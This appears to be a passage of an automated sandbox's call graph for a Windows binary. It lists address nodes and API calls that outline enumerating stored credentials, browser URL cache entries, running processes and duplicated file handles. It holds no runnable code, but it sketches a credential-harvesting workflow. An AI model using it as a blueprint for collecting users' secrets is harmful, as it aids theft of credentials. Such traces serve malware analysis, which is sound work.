38590->38618 38592 44490c 38619 44474a 8 API calls 38592->38619 38594 444921 38620 44474a 8 API calls 38594->38620 38596 444936 38621 44474a 8 API calls 38596->38621 38598 44494b 38622 44474a 8 API calls 38598->38622 38600 444960 ??3@YAXPAX 38600->38576 38602 44db70 38601->38602 38603 40d702 memset GetPrivateProfileStringW 38602->38603 38604 40d752 38603->38604 38605 40d75c WritePrivateProfileStringW 38603->38605 38604->38605 38606 40d758 38604->38606 38605->38606 38606->38563 38608 44db70 38607->38608 38609 40da8d memset 38608->38609 38610 40daac LoadStringW 38609->38610 38611 40dac6 38610->38611 38611->38610 38613 40dade 38611->38613 38623 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38611->38623 38613->38403 38614->38584 38615->38586 38616->38588 38617->38590 38618->38592 38619->38594 38620->38596 38621->38598 38622->38600 38623->38611 38634 409b98 GetFileAttributesW 38624->38634 38626 40daea 38627 40db63 38626->38627 38628 40daef wcscpy wcscpy GetPrivateProfileIntW 38626->38628 38627->38405 38635 40d65d GetPrivateProfileStringW 38628->38635 38630 40db3e 38636 40d65d GetPrivateProfileStringW 38630->38636 38632 40db4f 38637 40d65d GetPrivateProfileStringW 38632->38637 38634->38626 38635->38630 38636->38632 38637->38627 38673 40eaff 38638->38673 38642 411ae2 memset 38641->38642 38643 411b8f 38641->38643 38714 409bca GetModuleFileNameW 38642->38714 38655 411a8b 38643->38655 38645 411b0a wcsrchr 38646 411b22 wcscat 38645->38646 38647 411b1f 38645->38647 38715 414770 wcscpy wcscpy wcscpy CloseHandle 38646->38715 38647->38646 38649 411b67 38716 402afb 38649->38716 38653 411b7f 38772 40ea13 SendMessageW memset SendMessageW 38653->38772 38656 402afb 27 API calls 38655->38656 38657 411ac0 38656->38657 38658 4110dc 38657->38658 38659 41113e 38658->38659 38664 4110f0 38658->38664 38797 40969c LoadCursorW SetCursor 38659->38797 38661 411143 38798 4032b4 38661->38798 38816 444a54 38661->38816 38662 4110f7 _wcsicmp 38662->38664 38663 411157 38665 40ada2 _wcsicmp 38663->38665 38664->38659 38664->38662 38819 410c46 10 API calls 38664->38819 38668 411167 38665->38668 38666 4111af 38668->38666 38669 4111a6 qsort 38668->38669 38669->38666 38672->38487 38674 40eb10 38673->38674 38687 40e8e0 38674->38687 38677 40eb6c memcpy memcpy 38678 40ebe1 38677->38678 38685 40ebb7 38677->38685 38678->38677 38680 40ebf2 ??2@YAPAXI ??2@YAPAXI 38678->38680 38679 40d134 16 API calls 38679->38685 38681 40ec2e ??2@YAPAXI 38680->38681 38683 40ec65 38680->38683 38681->38683 38683->38683 38697 40ea7f 38683->38697 38685->38678 38685->38679 38686 402f49 38686->38487 38688 40e8f2 38687->38688 38689 40e8eb ??3@YAXPAX 38687->38689 38690 40e900 38688->38690 38691 40e8f9 ??3@YAXPAX 38688->38691 38689->38688 38692 40e90a ??3@YAXPAX 38690->38692 38694 40e911 38690->38694 38691->38690 38692->38694 38693 40e931 ??2@YAPAXI ??2@YAPAXI 38693->38677 38694->38693 38695 40e921 ??3@YAXPAX 38694->38695 38696 40e92a ??3@YAXPAX 38694->38696 38695->38696 38696->38693 38698 40aa04 free 38697->38698 38699 40ea88 38698->38699 38700 40aa04 free 38699->38700 38701 40ea90 38700->38701 38702 40aa04 free 38701->38702 38703 40ea98 38702->38703 38704 40aa04 free 38703->38704 38705 40eaa0 38704->38705 38706 40a9ce 4 API calls 38705->38706 38707 40eab3 38706->38707 38708 40a9ce 4 API calls 38707->38708 38709 40eabd 38708->38709 38710 40a9ce 4 API calls 38709->38710 38711 40eac7 38710->38711 38712 40a9ce 4 API calls 38711->38712 38713 40ead1 38712->38713 38713->38686 38714->38645 38715->38649 38773 40b2cc 38716->38773 38718 402b0a 38719 40b2cc 27 API calls 38718->38719 38720 402b23 38719->38720 38721 40b2cc 27 API calls 38720->38721 38722 402b3a 38721->38722 38723 40b2cc 27 API calls 38722->38723 38724 402b54 38723->38724 38725 40b2cc 27 API calls 38724->38725 38726 402b6b 38725->38726 38727 40b2cc 27 API calls 38726->38727 38728 402b82 38727->38728 38729 40b2cc 27 API calls 38728->38729 38730 402b99 38729->38730 38731 40b2cc 27 API calls 38730->38731 38732 402bb0 38731->38732 38733 40b2cc 27 API calls 38732->38733 38734 402bc7 38733->38734 38735 40b2cc 27 API calls 38734->38735 38736 402bde 38735->38736 38737 40b2cc 27 API calls 38736->38737 38738 402bf5 38737->38738 38739 40b2cc 27 API calls 38738->38739 38740 402c0c 38739->38740 38741 40b2cc 27 API calls 38740->38741 38742 402c23 38741->38742 38743 40b2cc 27 API calls 38742->38743 38744 402c3a 38743->38744 38745 40b2cc 27 API calls 38744->38745 38746 402c51 38745->38746 38747 40b2cc 27 API calls 38746->38747 38748 402c68 38747->38748 38749 40b2cc 27 API calls 38748->38749 38750 402c7f 38749->38750 38751 40b2cc 27 API calls 38750->38751 38752 402c99 38751->38752 38753 40b2cc 27 API calls 38752->38753 38754 402cb3 38753->38754 38755 40b2cc 27 API calls 38754->38755 38756 402cd5 38755->38756 38757 40b2cc 27 API calls 38756->38757 38758 402cf0 38757->38758 38759 40b2cc 27 API calls 38758->38759 38760 402d0b 38759->38760 38761 40b2cc 27 API calls 38760->38761 38762 402d26 38761->38762 38763 40b2cc 27 API calls 38762->38763 38764 402d3e 38763->38764 38765 40b2cc 27 API calls 38764->38765 38766 402d59 38765->38766 38767 40b2cc 27 API calls 38766->38767 38768 402d78 38767->38768 38769 40b2cc 27 API calls 38768->38769 38770 402d93 38769->38770 38771 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38770->38771 38771->38653 38772->38643 38776 40b58d 38773->38776 38775 40b2d1 38775->38718 38777 40b5a4 GetModuleHandleW FindResourceW 38776->38777 38778 40b62e 38776->38778 38779 40b5c2 LoadResource 38777->38779 38781 40b5e7 38777->38781 38778->38775 38780 40b5d0 SizeofResource LockResource 38779->38780 38779->38781 38780->38781 38781->38778 38789 40afcf 38781->38789 38783 40b608 memcpy 38792 40b4d3 memcpy 38783->38792 38785 40b61e 38793 40b3c1 18 API calls 38785->38793 38787 40b626 38794 40b04b 38787->38794 38790 40b04b ??3@YAXPAX 38789->38790 38791 40afd7 ??2@YAPAXI 38790->38791 38791->38783 38792->38785 38793->38787 38795 40b051 ??3@YAXPAX 38794->38795 38796 40b05f 38794->38796 38795->38796 38796->38778 38797->38661 38799 4032c4 38798->38799 38800 40b633 free 38799->38800 38801 403316 38800->38801 38820 44553b 38801->38820 38805 403480 39018 40368c 15 API calls 38805->39018 38807 403489 38808 40b633 free 38807->38808 38810 403495 38808->38810 38809 40333c 38809->38805 38811 4033a9 memset memcpy 38809->38811 38812 4033ec wcscmp 38809->38812 39016 4028e7 11 API calls 38809->39016 39017 40f508 6 API calls 38809->39017 38810->38663 38811->38809 38811->38812 38812->38809 38815 403421 _wcsicmp 38815->38809 38817 444a64 FreeLibrary 38816->38817 38818 444a83 38816->38818 38817->38818 38818->38663 38819->38664 38821 445548 38820->38821 38822 445599 38821->38822 39019 40c768 38821->39019 38823 4455a8 memset 38822->38823 38831 4457f2 38822->38831 39102 403988 38823->39102 38829 4455e5 38838 445672 38829->38838 38853 44560f 38829->38853 38876 445854 38831->38876 39205 403e2d memset memset memset memset memset 38831->39205 38832 4458bb memset memset 38835 414c2e 15 API calls 38832->38835 38834 44595e memset memset 38841 414c2e 15 API calls 38834->38841 38842 4458f9 38835->38842 38836 44557a 38843 44558c 38836->38843 39299 4136c0 CoTaskMemFree 38836->39299 39113 403fbe memset memset memset memset memset 38838->39113 38839 445a00 memset memset 39251 414c2e 38839->39251 38840 445b22 38845 445bca 38840->38845 38846 445b38 memset memset memset 38840->38846 38851 44599c 38841->38851 38852 40b2cc 27 API calls 38842->38852 39086 444b06 38843->39086 38863 445c8b memset memset 38845->38863 38917 445cf0 38845->38917 38858 445bd4 38846->38858 38859 445b98 38846->38859 38847 445849 39315 40b1ab free free 38847->39315 38862 40b2cc 27 API calls 38851->38862 38864 445909 38852->38864 38855 4087b3 337 API calls 38853->38855 38874 445621 38855->38874 38856 445585 39300 41366b FreeLibrary 38856->39300 38857 44589f 39316 40b1ab free free 38857->39316 38871 414c2e 15 API calls 38858->38871 38859->38858 38867 445ba2 38859->38867 38877 4459ac 38862->38877 38865 414c2e 15 API calls 38863->38865 38873 409d1f 6 API calls 38864->38873 38878 445cc9 38865->38878 39386 4099c6 wcslen 38867->39386 38868 4456b2 39303 40b1ab free free 38868->39303 38870 40b2cc 27 API calls 38882 445a4f 38870->38882 38884 445be2 38871->38884 38872 403335 39015 4452e5 45 API calls 38872->39015 38887 445919 38873->38887 39301 4454bf 20 API calls 38874->39301 38875 445823 38875->38847 38895 4087b3 337 API calls 38875->38895 38881 4458aa 38876->38881 39228 403c9c memset memset memset memset memset 38876->39228 38888 409d1f 6 API calls 38877->38888 38889 409d1f 6 API calls 38878->38889 38879 445879 38879->38857 38899 4087b3 337 API calls 38879->38899 38881->38832 38914 44594a 38881->38914 39265 409d1f wcslen wcslen 38882->39265 38893 40b2cc 27 API calls 38884->38893 38885 445d3d 38913 40b2cc 27 API calls 38885->38913 38886 445d88 memset memset memset 38896 414c2e 15 API calls 38886->38896 39317 409b98 GetFileAttributesW 38887->39317 38897 4459bc 38888->38897 38898 445ce1 38889->38898 38890 445bb3 39389 445403 memset 38890->39389 38891 445680 38891->38868 39136 4087b3 memset 38891->39136 38902 445bf3 38893->38902 38895->38875 38905 445dde 38896->38905 39382 409b98 GetFileAttributesW 38897->39382 39406 409b98 GetFileAttributesW 38898->39406 38899->38879 38912 409d1f 6 API calls 38902->38912 38903 445928 38903->38914 39318 40b6ef 38903->39318 38915 40b2cc 27 API calls 38905->38915 38907 4459cb 38916 4459ed 38907->38916 38926 40b6ef 249 API calls 38907->38926 38911 40b2cc 27 API calls 38919 445a94 38911->38919 38921 445c07 38912->38921 38922 445d54 _wcsicmp 38913->38922 38914->38834 38914->38916 38925 445def 38915->38925 38916->38839 38916->38840 38917->38872 38917->38885 38917->38886 38918 445389 255 API calls 38918->38845 39270 40ae18 38919->39270 38920 44566d 38920->38831 39187 413d4c 38920->39187 38929 445389 255 API calls 38921->38929 38930 445d71 38922->38930 38992 445d67 38922->38992 38924 445665 39302 40b1ab free free 38924->39302 38931 409d1f 6 API calls 38925->38931 38926->38916 38934 445c17 38929->38934 39407 445093 23 API calls 38930->39407 38937 445e03 38931->38937 38933 4456d8 38939 40b2cc 27 API calls 38933->38939 38940 40b2cc 27 API calls 38934->38940 38936 44563c 38936->38924 38942 4087b3 337 API calls 38936->38942 39408 409b98 GetFileAttributesW 38937->39408 38938 40b6ef 249 API calls 38938->38872 38944 4456e2 38939->38944 38945 445c23 38940->38945 38941 445d83 38941->38872 38942->38936 39304 413fa6 _wcsicmp _wcsicmp 38944->39304 38949 409d1f 6 API calls 38945->38949 38947 445e12 38950 445e6b 38947->38950 38954 40b2cc 27 API calls 38947->38954 38952 445c37 38949->38952 39410 445093 23 API calls 38950->39410 38951 4456eb 38957 4456fd memset memset memset memset 38951->38957 38958 4457ea 38951->38958 38959 445389 255 API calls 38952->38959 38953 445b17 39383 40aebe 38953->39383 38961 445e33 38954->38961 39305 409c70 wcscpy wcsrchr 38957->39305 39308 413d29 38958->39308 38965 445c47 38959->38965 38966 409d1f 6 API calls 38961->38966 38963 445e7e 38967 445f67 38963->38967 38970 40b2cc 27 API calls 38965->38970 38971 445e47 38966->38971 38972 40b2cc 27 API calls 38967->38972 38968 445ab2 memset 38973 40b2cc 27 API calls 38968->38973 38975 445c53 38970->38975 39409 409b98 GetFileAttributesW 38971->39409 38977 445f73 38972->38977 38978 445aa1 38973->38978 38974 409c70 2 API calls 38979 44577e 38974->38979 38980 409d1f 6 API calls 38975->38980 38982 409d1f 6 API calls 38977->38982 38978->38953 38978->38968 38983 409d1f 6 API calls 38978->38983 39277 40add4 38978->39277 39282 445389 38978->39282 39291 40ae51 38978->39291 38984 409c70 2 API calls 38979->38984 38985 445c67 38980->38985 38981 445e56 38981->38950 38989 445e83 memset 38981->38989 38986 445f87 38982->38986 38983->38978 38987 44578d 38984->38987 38988 445389 255 API calls 38985->38988 39413 409b98 GetFileAttributesW 38986->39413 38987->38958 38994 40b2cc 27 API calls 38987->38994 38988->38845 38993 40b2cc 27 API calls 38989->38993 38992->38872 38992->38938 38995 445eab 38993->38995 38996 4457a8 38994->38996 38997 409d1f 6 API calls 38995->38997 38998 409d1f 6 API calls 38996->38998 39000 445ebf 38997->39000 38999 4457b8 38998->38999 39307 409b98 GetFileAttributesW 38999->39307 39002 40ae18 9 API calls 39000->39002 39011 445ef5 39002->39011 39003 4457c7 39003->38958 39005 4087b3 337 API calls 39003->39005 39004 40ae51 9 API calls 39004->39011 39005->38958 39006 445f5c 39007 40aebe FindClose 39006->39007 39007->38967 39008 40add4 2 API calls 39008->39011 39009 40b2cc 27 API calls 39009->39011 39010 409d1f 6 API calls 39010->39011 39011->39004 39011->39006 39011->39008 39011->39009 39011->39010 39013 445f3a 39011->39013 39411 409b98 GetFileAttributesW 39011->39411 39412 445093 23 API calls 39013->39412 39015->38809 39016->38815 39017->38809 39018->38807 39020 40c775 39019->39020 39414 40b1ab free free 39020->39414 39022 40c788 39415 40b1ab free free 39022->39415 39024 40c790 39416 40b1ab free free 39024->39416 39026 40c798 39027 40aa04 free 39026->39027 39028 40c7a0 39027->39028 39417 40c274 memset 39028->39417 39033 40a8ab 9 API calls 39034 40c7c3 39033->39034 39035 40a8ab 9 API calls 39034->39035 39036 40c7d0 39035->39036 39446 40c3c3 39036->39446 39040 40c7e5 39041 40c877 39040->39041 39042 40c86c 39040->39042 39469 40a706 wcslen memcpy 39040->39469 39471 40c634 49 API calls 39040->39471 39049 40bdb0 39041->39049 39472 4053fe 39 API calls 39042->39472 39045 40c813 _wcslwr 39470 40c634 49 API calls 39045->39470 39047 40c829 wcslen 39047->39040 39724 404363 39049->39724 39052 40bf5d 39744 40440c 39052->39744 39054 40bdee 39054->39052 39057 40b2cc 27 API calls 39054->39057 39055 40bddf CredEnumerateW 39055->39054 39058 40be02 wcslen 39057->39058 39058->39052 39059 40be1e 39058->39059 39059->39052 39060 40be26 wcsncmp 39059->39060 39063 40be7d memset 39059->39063 39064 40bea7 memcpy 39059->39064 39065 40bf11 wcschr 39059->39065 39066 40b2cc 27 API calls 39059->39066 39068 40bf43 LocalFree 39059->39068 39747 40bd5d 28 API calls 39059->39747 39748 404423 39059->39748 39060->39059 39063->39059 39063->39064 39064->39059 39064->39065 39065->39059 39067 40bef6 _wcsnicmp 39066->39067 39067->39059 39067->39065 39068->39059 39069 4135f7 39761 4135e0 39069->39761 39072 40b2cc 27 API calls 39073 41360d 39072->39073 39074 40a804 8 API calls 39073->39074 39075 413613 39074->39075 39076 41361b 39075->39076 39077 41363e 39075->39077 39078 40b273 27 API calls 39076->39078 39079 4135e0 FreeLibrary 39077->39079 39080 413625 GetProcAddress 39078->39080 39081 413643 39079->39081 39080->39077 39082 413648 39080->39082 39081->38836 39083 413658 39082->39083 39084 4135e0 FreeLibrary 39082->39084 39083->38836 39085 413666 39084->39085 39085->38836 39764 4449b9 39086->39764 39089 444c1f 39089->38822 39090 4449b9 42 API calls 39092 444b4b 39090->39092 39091 444c15 39094 4449b9 42 API calls 39091->39094 39092->39091 39785 444972 GetVersionExW 39092->39785 39094->39089 39095 444b99 memcmp 39100 444b8c 39095->39100 39096 444c0b 39789 444a85 42 API calls 39096->39789 39100->39095 39100->39096 39786 444aa5 42 API calls 39100->39786 39787 40a7a0 GetVersionExW 39100->39787 39788 444a85 42 API calls 39100->39788 39103 40399d 39102->39103 39790 403a16 39103->39790 39105 403a09 39804 40b1ab free free 39105->39804 39107 4039a3 39107->39105 39111 4039f4 39107->39111 39801 40a02c CreateFileW 39107->39801 39108 403a12 wcsrchr 39108->38829 39111->39105 39112 4099c6 2 API calls 39111->39112 39112->39105 39114 414c2e 15 API calls 39113->39114 39115 404048 39114->39115 39116 414c2e 15 API calls 39115->39116 39117 404056 39116->39117 39118 409d1f 6 API calls 39117->39118 39119 404073 39118->39119 39120 409d1f 6 API calls 39119->39120 39121 40408e 39120->39121 39122 409d1f 6 API calls 39121->39122 39123 4040a6 39122->39123 39124 403af5 20 API calls 39123->39124 39125 4040ba 39124->39125 39126 403af5 20 API calls 39125->39126 39127 4040cb 39126->39127 39831 40414f memset 39127->39831 39129 404140 39845 40b1ab free free 39129->39845 39131 4040ec memset 39134 4040e0 39131->39134 39132 404148 39132->38891 39133 4099c6 2 API calls 39133->39134 39134->39129 39134->39131 39134->39133 39135 40a8ab 9 API calls 39134->39135 39135->39134 39858 40a6e6 WideCharToMultiByte 39136->39858 39138 4087ed 39859 4095d9 memset 39138->39859 39141 408809 memset memset memset memset memset 39142 40b2cc 27 API calls 39141->39142 39143 4088a1 39142->39143 39144 409d1f 6 API calls 39143->39144 39145 4088b1 39144->39145 39146 40b2cc 27 API calls 39145->39146 39147 4088c0 39146->39147 39148 409d1f 6 API calls 39147->39148 39149 4088d0 39148->39149 39150 40b2cc 27 API calls 39149->39150 39151 4088df 39150->39151 39152 409d1f 6 API calls 39151->39152 39153 4088ef 39152->39153 39154 40b2cc 27 API calls 39153->39154 39155 4088fe 39154->39155 39156 409d1f 6 API calls 39155->39156 39157 40890e 39156->39157 39158 40b2cc 27 API calls 39157->39158 39159 40891d 39158->39159 39160 409d1f 6 API calls 39159->39160 39161 40892d 39160->39161 39878 409b98 GetFileAttributesW 39161->39878 39163 40893e 39164 408943 39163->39164 39165 408958 39163->39165 39879 407fdf 75 API calls 39164->39879 39880 409b98 GetFileAttributesW 39165->39880 39169 408953 39169->38891 39188 40b633 free 39187->39188 39189 413d65 CreateToolhelp32Snapshot memset Process32FirstW 39188->39189 39190 413f00 Process32NextW 39189->39190 39191 413da5 OpenProcess 39190->39191 39192 413f17 CloseHandle 39190->39192 39193 413df3 memset 39191->39193 39197 413eb0 39191->39197 39192->38933 40103 413f27 39193->40103 39195 413ec8 39195->39197 40130 4099f4 malloc memcpy free 39195->40130 39196 413ebf free 39196->39197 39197->39190 39197->39195 39197->39196 39200 413e37 GetModuleHandleW 39201 413e1f 39200->39201 39202 413e46 GetProcAddress 39200->39202 39201->39200 40108 413959 39201->40108 40124 413ca4 39201->40124 39202->39201 39204 413ea2 CloseHandle 39204->39197 39206 414c2e 15 API calls 39205->39206 39207 403eb7 39206->39207 39208 414c2e 15 API calls 39207->39208 39209 403ec5 39208->39209 39210 409d1f 6 API calls 39209->39210 39211 403ee2 39210->39211 39212 409d1f 6 API calls 39211->39212 39213 403efd 39212->39213 39214 409d1f 6 API calls 39213->39214 39215 403f15 39214->39215 39216 403af5 20 API calls 39215->39216 39217 403f29 39216->39217 39218 403af5 20 API calls 39217->39218 39219 403f3a 39218->39219 39220 40414f 33 API calls 39219->39220 39224 403f4f 39220->39224 39221 403faf 40139 40b1ab free free 39221->40139 39222 403f5b memset 39222->39224 39224->39221 39224->39222 39226 4099c6 2 API calls 39224->39226 39227 40a8ab 9 API calls 39224->39227 39225 403fb7 39225->38875 39226->39224 39227->39224 39229 414c2e 15 API calls 39228->39229 39230 403d26 39229->39230 39231 414c2e 15 API calls 39230->39231 39232 403d34 39231->39232 39233 409d1f 6 API calls 39232->39233 39234 403d51 39233->39234 39235 409d1f 6 API calls 39234->39235 39236 403d6c 39235->39236 39237 409d1f 6 API calls 39236->39237 39238 403d84 39237->39238 39239 403af5 20 API calls 39238->39239 39240 403d98 39239->39240 39241 403af5 20 API calls 39240->39241 39242 403da9 39241->39242 39243 40414f 33 API calls 39242->39243 39244 403dbe 39243->39244 39245 403e1e 39244->39245 39247 403dca memset 39244->39247 39249 4099c6 2 API calls 39244->39249 39250 40a8ab 9 API calls 39244->39250 40140 40b1ab free free 39245->40140 39247->39244 39248 403e26 39248->38879 39249->39244 39250->39244 39252 414b81 9 API calls 39251->39252 39253 414c40 39252->39253 39254 414c73 memset 39253->39254 40141 409cea 39253->40141 39257 414c94 39254->39257 39260 414cf4 wcscpy 39257->39260 40144 414bb0 wcscpy 39257->40144 39258 414c64 SHGetSpecialFolderPathW 39259 414d0b 39258->39259 39259->38870 39260->39259 39262 414cd2 40145 4145ac RegQueryValueExW 39262->40145 39264 414ce9 39264->39260 39266 409d62 39265->39266 39267 409d43 wcscpy 39265->39267 39266->38911 39268 409719 2 API calls 39267->39268 39269 409d51 wcscat 39268->39269 39269->39266 39271 40aebe FindClose 39270->39271 39272 40ae21 39271->39272 39273 4099c6 2 API calls 39272->39273 39274 40ae35 39273->39274 39275 409d1f 6 API calls 39274->39275 39276 40ae49 39275->39276 39276->38978 39278 40ade0 39277->39278 39279 40ae0f 39277->39279 39278->39279 39280 40ade7 wcscmp 39278->39280 39279->38978 39280->39279 39281 40adfe wcscmp 39280->39281 39281->39279 39283 40ae18 9 API calls 39282->39283 39289 4453c4 39283->39289 39284 40ae51 9 API calls 39284->39289 39285 4453f3 39286 40aebe FindClose 39285->39286 39288 4453fe 39286->39288 39287 40add4 2 API calls 39287->39289 39288->38978 39289->39284 39289->39285 39289->39287 39290 445403 250 API calls 39289->39290 39290->39289 39292 40ae7b FindNextFileW 39291->39292 39293 40ae5c FindFirstFileW 39291->39293 39294 40ae94 39292->39294 39295 40ae8f 39292->39295 39293->39294 39296 409d1f 6 API calls 39294->39296 39298 40aeb6 39294->39298 39297 40aebe FindClose 39295->39297 39296->39298 39297->39294 39298->38978 39299->38856 39300->38843 39301->38936 39302->38920 39303->38920 39304->38951 39306 409c89 39305->39306 39306->38974 39307->39003 39309 413d39 39308->39309 39310 413d2f FreeLibrary 39308->39310 39311 40b633 free 39309->39311 39310->39309 39312 413d42 39311->39312 39313 40b633 free 39312->39313 39314 413d4a 39313->39314 39314->38831 39315->38876 39316->38881 39317->38903 39319 44db70 39318->39319 39320 40b6fc memset 39319->39320 39321 409c70 2 API calls 39320->39321 39322 40b732 wcsrchr 39321->39322 39323 40b743 39322->39323 39324 40b746 memset 39322->39324 39323->39324 39325 40b2cc 27 API calls 39324->39325 39326 40b76f 39325->39326 39327 409d1f 6 API calls 39326->39327 39328 40b783 39327->39328 40146 409b98 GetFileAttributesW 39328->40146 39330 40b792 39331 409c70 2 API calls 39330->39331 39344 40b7c2 39330->39344 39333 40b7a5 39331->39333 39335 40b2cc 27 API calls 39333->39335 39339 40b7b2 39335->39339 39336 40b837 CloseHandle 39338 40b83e memset 39336->39338 39337 40b817 39340 409a45 3 API calls 39337->39340 40180 40a6e6 WideCharToMultiByte 39338->40180 39342 409d1f 6 API calls 39339->39342 39346 40b827 39340->39346 39342->39344 39343 40b866 39345 444432 120 API calls 39343->39345 40147 40bb98 39344->40147 39347 40b879 39345->39347 39346->39338 39348 40bad5 39347->39348 39349 40b273 27 API calls 39347->39349 39351 40b04b ??3@YAXPAX 39348->39351 39350 40b89a 39349->39350 39352 438552 133 API calls 39350->39352 39353 40baf3 39351->39353 39354 40b8a4 39352->39354 39353->38914 39355 40bacd 39354->39355 39357 4251c4 136 API calls 39354->39357 39356 443d90 110 API calls 39355->39356 39356->39348 39379 40b8b8 39357->39379 39358 40bac6 40190 424f26 122 API calls 39358->40190 39359 40b8bd memset 40181 425413 17 API calls 39359->40181 39362 425413 17 API calls 39362->39379 39365 40a71b MultiByteToWideChar 39365->39379 39368 40b9b5 memcmp 39368->39379 39369 4099c6 2 API calls 39369->39379 39370 404423 37 API calls 39370->39379 39372 4251c4 136 API calls 39372->39379 39373 40bb3e memset memcpy 40191 40a734 MultiByteToWideChar 39373->40191 39376 40bb88 LocalFree 39376->39379 39379->39358 39379->39359 39379->39362 39379->39365 39379->39368 39379->39369 39379->39370 39379->39372 39379->39373 39380 40ba5f memcmp 39379->39380 39381 40a734 MultiByteToWideChar 39379->39381 40182 4253ef 16 API calls 39379->40182 40183 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 39379->40183 40184 4253af 17 API calls 39379->40184 40185 4253cf 17 API calls 39379->40185 40186 447280 memset 39379->40186 40187 447960 memset memcpy memcpy memcpy 39379->40187 40188 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 39379->40188 40189 447920 memcpy memcpy memcpy 39379->40189 39380->39379 39381->39379 39382->38907 39384 40aed1 39383->39384 39385 40aec7 FindClose 39383->39385 39384->38840 39385->39384 39387 4099d7 39386->39387 39388 4099da memcpy 39386->39388 39387->39388 39388->38890 39390 40b2cc 27 API calls 39389->39390 39391 44543f 39390->39391 39392 409d1f 6 API calls 39391->39392 39393 44544f 39392->39393 40280 409b98 GetFileAttributesW 39393->40280 39395 44545e 39396 445476 39395->39396 39397 40b6ef 249 API calls 39395->39397 39398 40b2cc 27 API calls 39396->39398 39397->39396 39399 445482 39398->39399 39400 409d1f 6 API calls 39399->39400 39401 445492 39400->39401 40281 409b98 GetFileAttributesW 39401->40281 39403 4454a1 39404 4454b9 39403->39404 39405 40b6ef 249 API calls 39403->39405 39404->38918 39405->39404 39406->38917 39407->38941 39408->38947 39409->38981 39410->38963 39411->39011 39412->39011 39413->38992 39414->39022 39415->39024 39416->39026 39418 414c2e 15 API calls 39417->39418 39419 40c2ae 39418->39419 39473 40c1d3 39419->39473 39424 40c3be 39441 40a8ab 39424->39441 39425 40afcf 2 API calls 39426 40c2fd FindFirstUrlCacheEntryW 39425->39426 39427 40c3b6 39426->39427 39428 40c31e wcschr 39426->39428 39429 40b04b ??3@YAXPAX 39427->39429 39430 40c331 39428->39430 39431 40c35e FindNextUrlCacheEntryW 39428->39431 39429->39424 39433 40a8ab 9 API calls 39430->39433 39431->39428 39432 40c373 GetLastError 39431->39432 39434 40c3ad FindCloseUrlCache 39432->39434 39435 40c37e 39432->39435 39436 40c33e wcschr 39433->39436 39434->39427 39438 40afcf 2 API calls 39435->39438 39436->39431 39437 40c34f 39436->39437 39439 40a8ab 9 API calls 39437->39439 39440 40c391 FindNextUrlCacheEntryW 39438->39440 39439->39431 39440->39428 39440->39434 39656 40a97a 39441->39656 39444 40a8cc 39444->39033 39662 40b1ab free free 39446->39662 39448 40c3dd 39449 40b2cc 27 API calls 39448->39449 39450 40c3e7 39449->39450 39451 40c50e 39450->39451 39452 40c3ff 39450->39452 39466 405337 39451->39466 39453 40a9ce 4 API calls 39452->39453 39454 40c418 memset 39453->39454 39663 40aa1d 39454->39663 39457 40c471 39459 40c47a _wcsupr 39457->39459 39458 40c505 39458->39451 39665 40a8d0 7 API calls 39459->39665 39461 40c498 39666 40a8d0 7 API calls 39461->39666 39463 40c4ac memset 39464 40aa1d 39463->39464 39465 40c4e4 RegEnumValueW 39464->39465 39465->39458 39465->39459 39667 405220 39466->39667 39469->39045 39470->39047 39471->39040 39472->39041 39474 40ae18 9 API calls 39473->39474 39480 40c210 39474->39480 39475 40ae51 9 API calls 39475->39480 39476 40c264 39477 40aebe FindClose 39476->39477 39479 40c26f 39477->39479 39478 40add4 2 API calls 39478->39480 39485 40e5ed memset memset 39479->39485 39480->39475 39480->39476 39480->39478 39481 40c231 _wcsicmp 39480->39481 39483 40c1d3 34 API calls 39480->39483 39481->39480 39482 40c248 39481->39482 39498 40c084 21 API calls 39482->39498 39483->39480 39486 414c2e 15 API calls 39485->39486 39487 40e63f 39486->39487 39488 409d1f 6 API calls 39487->39488 39489 40e658 39488->39489 39499 409b98 GetFileAttributesW 39489->39499 39491 40e667 39492 40e680 39491->39492 39493 409d1f 6 API calls 39491->39493 39500 409b98 GetFileAttributesW 39492->39500 39493->39492 39495 40e68f 39497 40c2d8 39495->39497 39501 40e4b2 39495->39501 39497->39424 39497->39425 39498->39480 39499->39491 39500->39495 39522 40e01e 39501->39522 39503 40e593 39504 40e5b0 39503->39504 39505 40e59c DeleteFileW 39503->39505 39506 40b04b ??3@YAXPAX 39504->39506 39505->39504 39508 40e5bb 39506->39508 39507 40e521 39507->39503 39545 40e175 39507->39545 39510 40e5c4 CloseHandle 39508->39510 39511 40e5cc 39508->39511 39510->39511 39513 40b633 free 39511->39513 39512 40e573 39515 40e584 39512->39515 39516 40e57c CloseHandle 39512->39516 39514 40e5db 39513->39514 39517 40b633 free 39514->39517 39588 40b1ab free free 39515->39588 39516->39515 39519 40e5e3 39517->39519 39519->39497 39521 40e540 39521->39512 39565 40e2ab 39521->39565 39589 406214 39522->39589 39525 40e16b 39525->39507 39528 40afcf 2 API calls 39529 40e08d OpenProcess 39528->39529 39530 40e0a4 GetCurrentProcess DuplicateHandle 39529->39530 39534 40e152 39529->39534 39531 40e0d0 GetFileSize 39530->39531 39532 40e14a CloseHandle 39530->39532 39625 409a45 GetTempPathW 39531->39625 39532->39534 39533 40e160 39537 40b04b ??3@YAXPAX 39533->39537 39534->39533 39536 406214 22 API calls 39534->39536 39536->39533 39537->39525 39538 40e0ea 39628 4096dc CreateFileW 39538->39628 39540 40e0f1 CreateFileMappingW 39541 40e140 CloseHandle CloseHandle 39540->39541 39542 40e10b MapViewOfFile 39540->39542 39541->39532 39543 40e13b CloseHandle 39542->39543 39544 40e11f WriteFile UnmapViewOfFile 39542->39544 39543->39541 39544->39543 39546 40e18c 39545->39546 39629 406b90 39546->39629 39549 40e1a7 memset 39555 40e1e8 39549->39555 39550 40e299 39639 4069a3 39550->39639 39556 40dd50 _wcsicmp 39555->39556 39557 40e283 39555->39557 39563 40e244 _snwprintf 39555->39563 39646 406e8f 13 API calls 39555->39646 39647 40742e 8 API calls 39555->39647 39648 40aae3 wcslen wcslen _memicmp 39555->39648 39650 406b53 SetFilePointerEx ReadFile 39555->39650 39556->39555 39558 40e291 39557->39558 39559 40e288 free 39557->39559 39560 40aa04 free 39558->39560 39559->39558 39560->39550 39649 40a8d0 7 API calls 39563->39649 39566 40e2c2 39565->39566 39567 406b90 11 API calls 